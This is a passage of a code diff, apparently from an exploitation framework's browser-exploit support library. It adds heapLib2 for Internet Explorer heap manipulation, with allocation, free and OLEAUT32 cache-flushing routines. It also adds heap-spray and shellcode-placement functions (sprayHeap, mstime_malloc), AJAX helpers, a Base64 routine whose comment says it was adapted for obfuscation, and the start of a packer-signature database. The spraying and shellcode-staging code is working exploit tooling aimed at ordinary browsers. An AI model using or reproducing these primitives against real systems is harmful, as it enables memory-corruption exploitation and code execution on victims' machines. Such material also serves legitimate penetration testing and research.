+        throw "alloc.argument: size is not a number: " + size; 
+
+    //make sure the size isn't one of the special values
+    if(!cache_ok && (size == 0x20 || size == 0x40 || size == 0x100 || size == 0x8000)) 
+        throw "alloc.argument: size cannot be flushed from cache: " + size; 
+
+    if(size > this.maxAlloc)
+        throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    //the size must be at a 16-byte boundary this can be commented out but 
+    //the allocations will be rounded to the nearest 16-byte boundary 
+    if(size % 16 != 0)
+        throw "alloc.argument: size be a multiple of 16: " + size;
+
+    //20-bytes will be added to the size
+    //<4-byte size><data><2-byte null>
+    size = ((size / 2) - 6);
+
+    //May have to change this due to allocation side effects
+    var data = new Array(size).join(cache_ok ? "C" : "$"); 
+
+    var attr = document.createAttribute(attr_name);
+    this.element.setAttributeNode(attr);
+    this.element.setAttribute(attr_name, data);
+
+}
+
+//These items will allocate/free memory and should really 
+//only be used once per element. You can use a new element 
+//by calling the 'newelement' method above
+heapLib2.ie.prototype.alloc_nobstr = function(val)
+{
+    //make sure the aval is a string
+    if(typeof val != "string")
+        throw "alloc.argument: val is not a string"; 
+
+    var size = (val.length * 2) + 6; 
+
+    if(size > this.maxAlloc)
+        throw "alloc_nobstr.val: string length cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    var i = 0;
+    var set_gattr = 0; 
+    for(i = 0; i < global_attrs.length; i++)
+    {
+        curr_gattr = global_attrs[i];
+        if(!this.element.getAttribute(curr_gattr))
+        {
+            this.element.setAttribute(curr_gattr, "");
+            this.element.setAttribute(curr_gattr, val);
+            set_gattr = 1;  
+            break; 
+        }
+    }
+
+    if(set_gattr == 0)
+        throw "alloc_nobstr: all global attributes are assigned, try a new element"; 
+}
+
+//completely bypass the cache, useful for heap spraying (see heapLib2_test.html)
+heapLib2.ie.prototype.sprayalloc = function(attr_name, str) 
+{
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(this.element.getAttribute(attr_name))
+        throw "alloc.argument: element already contains attr_name: " + attr_name;
+
+    //ensure the size is a number
+    if(typeof str != "string")
+        throw "alloc.argument: str is not a string: " + typeof str; 
+
+    var size = (str.length * 2) + 6; 
+
+    //make sure the size isn't one of the special values
+    if(size <= 0x8000) 
+        throw "alloc.argument: bigalloc must be greater than 0x8000: " + size; 
+
+    if(size > this.maxAlloc)
+        throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    var attr = document.createAttribute(attr_name);
+    this.element.setAttributeNode(attr);
+    this.element.setAttribute(attr_name, str);
+}
+
+heapLib2.ie.prototype.free = function(attr_name, skip_flush) 
+{
+    if(typeof(skip_flush)==='undefined')
+        skip_flush = false;
+    else
+        skip_flush = true;
+
+    //make sure that an HTML DOM element is passed
+    if(!this.element.nodeType || this.element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(!this.element.getAttribute(attr_name))
+        throw "alloc.argument: element does not contain attribute: " + attr_name;
+
+    //make sure the cache is full so the chunk returns the general purpose heap
+    if(!skip_flush)
+        this.Oleaut32FillCache(); 
+
+    this.element.setAttribute(attr_name, null);
+
+    if(!skip_flush)
+        this.Oleaut32EmptyCache()
+}
+
+heapLib2.ie.prototype.Oleaut32FillCache = function()
+{
+    for(var i = 0; i < 6; i++)
+    {
+        this.free("cache0x20"+i, true); 
+        this.free("cache0x40"+i, true);
+        this.free("cache0x100"+i, true);
+        this.free("cache0x8000"+i, true);
+    }
+}
+
+heapLib2.ie.prototype.Oleaut32EmptyCache = function() 
+{
+    for(var i = 0; i < 6; i++)
+    {
+        this.alloc("cache0x20"+i, 0x20, true); 
+        this.alloc("cache0x40"+i, 0x40, true);
+        this.alloc("cache0x100"+i, 0x100, true);
+        this.alloc("cache0x8000"+i, 0x8000, true);
+    }
+}
@@ -0,0 +1,31 @@
+function mstime_malloc(oArg) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined) { throw "Missing argument: shellcode"; }
+  if (offset        == undefined) { offset = 0; }
+  if (heapBlockSize == undefined) { throw "Size must be defined"; }
+
+  var buf = "";
+  for (var i=0; i < heapBlockSize/4; i++) {
+    if (i == offset) {
+      if (i == 0) { buf += shellcode;       }
+      else        { buf += ";" + shellcode; }
+    }
+    else {
+      buf += ";#W00TA";
+    }
+  }
+
+  var e = document.getElementById(objId);
+  if (e == null) {
+    var eleId = "W00TB"
+    var acTag = "<t:ANIMATECOLOR id='"+ eleId  + "'/>"
+    document.body.innerHTML = document.body.innerHTML + acTag;
+    e = document.getElementById(eleId);
+  }
+  try { e.values = buf; }
+  catch (e) {}
+}
@@ -0,0 +1,38 @@
+var sym_div_container;
+function sprayHeap( oArg ) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var maxAllocs     = oArg.maxAllocs;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
+  if (offset        == undefined)  { offset        = 0x00; }
+  if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
+  if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
+
+  if (offset > 0x800) { throw "Bad alignment"; }
+
+  sym_div_container = document.getElementById(objId);
+
+  if (sym_div_container == null) {
+    sym_div_container = document.createElement("div");
+  }
+
+  sym_div_container.style.cssText = "display:none";
+  var data;
+  junk = unescape("%u2020%u2020");
+  while (junk.length < offset+0x1000) junk += junk;
+
+  data = junk.substring(0,offset) + shellcode;
+  data += junk.substring(0,0x800-offset-shellcode.length);
+
+  while (data.length < heapBlockSize) data += data;
+
+  for (var i = 0; i < maxAllocs; i++)
+  {
+    var obj = document.createElement("button");
+    obj.title = data.substring(0, (heapBlockSize-2)/2);
+    sym_div_container.appendChild(obj);
+  }
+}
@@ -0,0 +1,33 @@
+function ajax_download(oArg) {
+  if (!oArg.method) { oArg.method = "GET"; }
+  if (!oArg.path)   { throw "Missing parameter 'path'"; }
+  if (!oArg.data)   { oArg.data = null; }
+
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open(oArg.method, oArg.path, !!oArg.cb);
+
+  if (oArg.cb) {
+    xmlHttp.onreadystatechange = function() {
+      if (xmlHttp.readyState == 4) { 
+        oArg.cb.apply(this);
+      }
+    };
+
+    xmlHttp.send(oArg.data);
+  }
+  else {
+    xmlHttp.send(oArg.data);
+    if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+      return xmlHttp.responseText;
+    }
+
+    return null;
+  }
+
+  return xmlHttp;
+}
@@ -0,0 +1,18 @@
+function postInfo(path, data, cb) {
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open('POST', path, !!cb);
+
+  if (cb) {
+    xmlHttp.onreadystatechange = function() {
+      if (xmlHttp.readyState == 4) { cb.apply(this, arguments); }
+    };
+  }
+
+  xmlHttp.send(data);
+  return xmlHttp;
+}
@@ -0,0 +1,15 @@
+if (!window.XMLHTTPRequest) {
+  (function() {
+    var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
+    for (idx = 0; idx < activeObjs.length; idx++) {
+      try {
+        new ActiveXObject(activeObjs[idx]);
+        window.XMLHttpRequest = function() {
+          return new ActiveXObject(activeObjs[idx]);
+        };
+        break;
+      }
+      catch (e) {}
+    }
+  })();
+}
@@ -0,0 +1,126 @@
+// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
+// variable names changed to make obfuscation easier
+var Base64 = {
+  // private property
+  _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+  // private method
+  _utf8_encode : function ( input ){
+    input = input.replace(/\r\n/g,"\\n");
+    var utftext = "";
+    var input_idx;
+
+    for (input_idx = 0; input_idx < input.length; input_idx++) {
+      var chr = input.charCodeAt(input_idx);
+      if (chr < 128) {
+        utftext += String.fromCharCode(chr);
+      }
+      else if((chr > 127) && (chr < 2048)) {
+        utftext += String.fromCharCode((chr >> 6) | 192);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      } else {
+        utftext += String.fromCharCode((chr >> 12) | 224);
+        utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      }
+    }
+
+    return utftext;
+  },
+
+  // public method for encoding
+  encode : function( input ) {
+    var output = "";
+    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
+    var input_idx = 0;
+
+    input = Base64._utf8_encode(input);
+
+    while (input_idx < input.length) {
+      chr1 = input.charCodeAt( input_idx++ );
+      chr2 = input.charCodeAt( input_idx++ );
+      chr3 = input.charCodeAt( input_idx++ );
+
+      enc1 = chr1 >> 2;
+      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
+      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
+      enc4 = chr3 & 63;
+
+      if (isNaN(chr2)) {
+        enc3 = enc4 = 64;
+      } else if (isNaN(chr3)) {
+        enc4 = 64;
+      }
+      output = output +
+      this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
+      this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
+    }
+    return output;
+  },
+  // public method for decoding
+  decode : function (input) {
+    var output = "";
+    var chr1, chr2, chr3;
+    var enc1, enc2, enc3, enc4;
+    var i = 0;
+
+    input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
+
+    while (i < input.length) {
+
+      enc1 = this._keyStr.indexOf(input.charAt(i++));
+      enc2 = this._keyStr.indexOf(input.charAt(i++));
+      enc3 = this._keyStr.indexOf(input.charAt(i++));
+      enc4 = this._keyStr.indexOf(input.charAt(i++));
+
+      chr1 = (enc1 << 2) | (enc2 >> 4);
+      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+      chr3 = ((enc3 & 3) << 6) | enc4;
+
+      output = output + String.fromCharCode(chr1);
+
+      if (enc3 != 64) {
+        output = output + String.fromCharCode(chr2);
+      }
+      if (enc4 != 64) {
+        output = output + String.fromCharCode(chr3);
+      }
+
+    }
+
+    output = Base64._utf8_decode(output);
+
+    return output;
+
+  },
+  _utf8_decode : function (utftext) {
+    var string = "";
+    var input_idx = 0;
+    var chr1 = 0;
+    var chr2 = 0;
+    var chr3 = 0;
+
+    while ( input_idx < utftext.length ) {
+
+      chr1 = utftext.charCodeAt(input_idx);
+
+      if (chr1 < 128) {
+        string += String.fromCharCode(chr1);
+        input_idx++;
+      }
+      else if((chr1 > 191) && (chr1 < 224)) {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
+        input_idx += 2;
+      } else {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        chr3 = utftext.charCodeAt(input_idx+2);
+        string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
+        input_idx += 3;
+      }
+    }
+
+    return string;
+  }
+
+};
@@ -0,0 +1,3043 @@
+[Name of the Packer v1.0]
+signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE ?? 90 40 00 8D BE ?? ?? FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 55 00 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 01 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07
+ep_only = true
+
+[Exact Audio Copy -> (UnknownCompiler)]
+signature = E8 ?? ?? ?? 00 31 ED 55 89 E5 81 EC ?? 00 00 00 8D BD ?? FF FF FF B9 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.00 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 51 FF FF FF 5F BB 28 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1C ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB 27 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 07 74 EF FE 07 75 06 47 FF 37 AF EB 09 FE 07 0F 84 1A ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1B ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.30 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.31 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 88 01 00 00
+ep_only = true
+
+[FSG 1.31 -> dulek/xt]
+signature = BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80
+ep_only = true
+
+[FSG v1.33 (Eng) -> dulek/xt]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 9D 8B D6 5E AD 48 74 0A 79 02 AD 50 56 8B F2 97 EB 87 AD 93 5E 46 AD 97 56 FF 13 95 AC 84 C0 75 FB FE 0E 74 F0 79 05 46 AD 50 EB 09 FE 0E 0F 84 ?? ?? ?? FF 56 55 FF 53 04 AB EB E0 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 54 01 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 01 00 00 6F 01 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[NoodleCrypt v2.00 (Eng) -> NoodleSpa]
+signature = EB 01 9A E8 76 00 00 00 EB 01 9A E8 65 00 00 00 EB 01 9A E8 7D 00 00 00 EB 01 9A E8 55 00 00 00 EB 01 9A E8 43 04 00 00 EB 01 9A E8 E1 00 00 00 EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 9A E8 25 00 00 00 EB 01 9A E8 02 04 00 00 EB 01 9A E8 19 07 00 00 EB 01 9A E8 9C 00 00 00 EB 01 9A E8 9C 06 00 00 E8 00 00 00 00 0F 7E F8 EB 01 9A 8B F8 C3 E8 00 00 00 00 58 EB 01 9A 25 00 F0 FF FF 8B F8 EB 01 9A 0F 6E F8 C3 8B D0 EB 01 9A 81 C2 C8 00 00 00 EB 01 9A B9 00 17 00 00 EB 01 9A C0 0A 06 EB 01 9A 80 2A 15 EB 01 9A 42 E2 EE 0F 6E C0 EB 01 9A 0F 7E C0 EB 01 9A 8B D0 00 85 EB A5 F5 65 4B 45 45 00 85 EB B3 65 07 45 45 00 85 EB 75 C7 C6 00 85 EB 65 CF 8A 00 85 EB D5 FD C0 00 85 EB 7F E5 05 05 05 00 85 EB 7F 61 06 45 45 00 85 EB 7F
+ep_only = true
+
+[PassLock 2000 v1.0 (Eng) -> Moonlight-Software]
+signature = 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01 00 00 C7 43 60 01 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 83 EC 44 C7 04 24 44 00 00 00 C7 44 24 2C 00 00 00 00 54 FF 15 E8 61 40 00 B8 0A 00 00 00 F7 44 24 2C 01 00 00 00 74 05 0F B7 44 24 30 83 C4 44 89 43 56 FF 15 D0 61 40 00 E8 9E 00 00 00 89 43 4C FF 15 D4 61 40 00 89 43 48 6A 00 FF 15 E4 61 40 00 89 43 5C E8 F9 00 00 00 E8 AA 00 00 00 B8 FF 00 00 00 72 0D 53 E8 96 00 00 00 5B FF 4B 10 FF 4B 18 5F 5E 5B 5D 50 FF 15 C8 61 40 00 C3 83 7D 0C 01 75 3F E8 81 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 FF 15 D0 61 40 00 E8 3A 00 00 00 89 43 4C FF 15 D4 61 40 00 89 43 48 8B 45 08 89 43 5C E8 9A 00 00 00 E8 4B 00 00 00 72 11 66 FF 43 5A 8B 45 0C 89 43 60 53
+ep_only = true
+
+[PESpin v0.3 (Eng) -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00
+ep_only = true
+
+[PeX v0.99 (Eng) -> bart/CrackPl]
+signature = E9 F5 00 00 00 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 20 50 65 58 20 28 63 29 20 62 79 20 62 61 72 74 5E 43 72 61 63 6B 50 6C 20 62 65 74 61 20 72 65 6C 65 61 73 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 60 E8 01 00 00
+ep_only = true
+
+[Special EXE Pasword Protector v1.01 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 00 00 8D 95 C6 77 00 00 8D 8D FF 77 00 00 55 68 00 20 00 00 51 52 6A 00 FF 95 04 7A 00 00 5D 6A 00 FF 95 FC 79 00 00 8D 8D 60 78 00 00 8D 95 85 01 00 00 55 68 00 04 00 00 52 6A 00 51 50 FF 95 08 7A 00 00 5D 8D B5 3F 78 00 00 6A 00 6A 00 6A 00 56 FF 95 0C 7A 00 00 0B C0 0F 84 FE 00 00 00 56 FF 95 10 7A 00 00 56 FF 95 14 7A 00 00 80 BD 3E 78 00 00 00 74 D4 33 D2 8B BD 3E 77 00 00 8D 85 1D 02 00 00 89 85 42 77 00 00 8D 85 49 02 00 00 89 85 46 77 00 00 8D 85 EB 75 00 00 89 85 4A 77 00 00 8B 84 D5 24 76 00 00 03 F8 8B 8C D5 28 76 00 00 3B 85 36 77 00 00 60 74 1F 8D B5 BD 02 00 00 FF D6 85 D2 75 11 60 87 FE 8D BD 15 78 00 00 B9 08 00 00 00 F3 A5 61 EB 15 8D 85 9F 02 00
+ep_only = true
+
+[SVK Protector v1.32 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[SVK Protector v1.3x (Eng) -> Pavol Cerven]
